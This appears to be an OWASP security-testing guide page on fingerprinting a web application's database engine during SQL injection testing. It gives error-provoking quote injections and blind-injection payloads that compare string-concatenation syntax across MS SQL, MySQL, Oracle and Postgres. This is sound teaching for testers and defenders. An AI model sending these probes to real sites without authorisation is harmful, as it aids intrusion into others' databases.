OWASP Backend Security Project DBMS Fingerprint

= Fingerprint remote DBMS =

To furthermore exploit SQL Injection vulnerability you need to know what kind of Database Engine your web application is using. There are a few techniques to accomplish this task: * Error Code Analysis * Engine Fingerprint

Error Codes Analysis
By performing fault injection, or fuzzing, you can gather important information through error code analysis. Let'see some examples:

http://www.example.com/store/findproduct.php?name='

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ' at line 1

http://www.example.com/store/products.php?id=' Warning: pg_exec [function.pg-exec]: Query failed: ERROR: unterminated quoted string at or near "'" LINE 1: SELECT * FROM products WHERE ID=' ^ in /var/www/store/products.php on line 9

Engine Fingerprint
First of all let see what differences exists between DBMS. One of the biggest difference between different database engine is on how they concatenate strings:

MS SQL:   +  MySQL:   CONCAT(,) Oracle:   || , CONCAT(,) Postgres:  || 

As you can see both Oracle and Postgres use the || operator to perform such a concatenation, so we need another difference to distinguish them.

PL/SQL define the CONCAT operator as well to perform string concatenation and as you can guess this one is not defined on Postgres.

Example:

Let say you're testing the following URL: http://www.example.com/news.php?id=1

You checked that the above URL is vulnerable to a Blind SQL Injection. It means that http://www.example.com/news.php return back the same contents with both id=1 (http://www.example.com/news.php?id=1) and id=1 AND 1=1 (http://www.example.com/news.php?id=1 AND 1=1)

You know that different engine have different operators to perform string concatenation as well so all you have to do is to compare the orginal page (id=1) with:


 * id=1 AND 'aa'='a'+'a'         [MS SQL]
 * id=1 AND 'aa'=CONCAT('a','a') [MySQL/Oracle]
 * id=1 AND 'a'='a'||'a'         [Oracle/Postgres]

MS SQL: The following comparison should be true:
 * http://www.example.com/news.php?id=1
 * http://www.example.com/news.php?id=1 AND 'aa'='a'+'a'

MySQL:: The following comparison should be true:
 * http://www.example.com/news.php?id=1
 * http://www.example.com/news.php?id=1 AND 'aa'=CONCAT('a','a')

Oracle: The following comparison should be true:
 * http://www.example.com/news.php?id=1
 * http://www.example.com/news.php?id=1 AND 'aa'=CONCAT('a','a')
 * http://www.example.com/news.php?id=1 AND 'aa'='a'||'a'

Postgres: The following comparison should be true:
 * http://www.example.com/news.php?id=1
 * http://www.example.com/news.php?id=1 AND 'aa'='a'||'a'

Tools
Bernardo Damele and Daniele Bellucci: sqlmap a blind SQL injection tool